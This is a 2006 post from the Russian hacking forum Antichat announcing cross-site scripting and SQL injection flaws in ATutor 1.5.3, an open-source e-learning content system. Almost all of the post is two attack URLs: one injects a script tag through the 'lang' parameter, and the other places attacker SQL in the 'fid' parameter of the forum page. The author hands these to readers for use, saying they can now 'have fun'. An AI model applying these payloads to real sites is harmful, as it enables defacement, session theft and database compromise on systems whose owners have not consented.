Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   XSS и SQL injection на ATutor 1.5.3 (https://forum.antichat.xyz/showthread.php?t=21572)

Dracula4ever 10.07.2006 19:20
XSS и SQL injection на ATutor 1.5.3
 
ATutor 1.5.3 (http://www.atutor.ca)



(1)...:XSS...:

http://TheSite.ru/documentation/index_list.php?lang="><script>alert(/тупой инклуд/)</script>



(1)...:SQL injection...:

http://TheSite.ru/forum/index.php?fid=-1[ваш SQL код]



Я думаю что вы теперь сможете вовесилиться.


P.S.
Для тех кто не знает что такое ATutor тогда ATutor является бесплатной Open Source основанной на Web Системой Управления Контентом Обучения разработанной с возможностью обеспечения доступа и адаптации по Вашему желанию.


Время: 18:30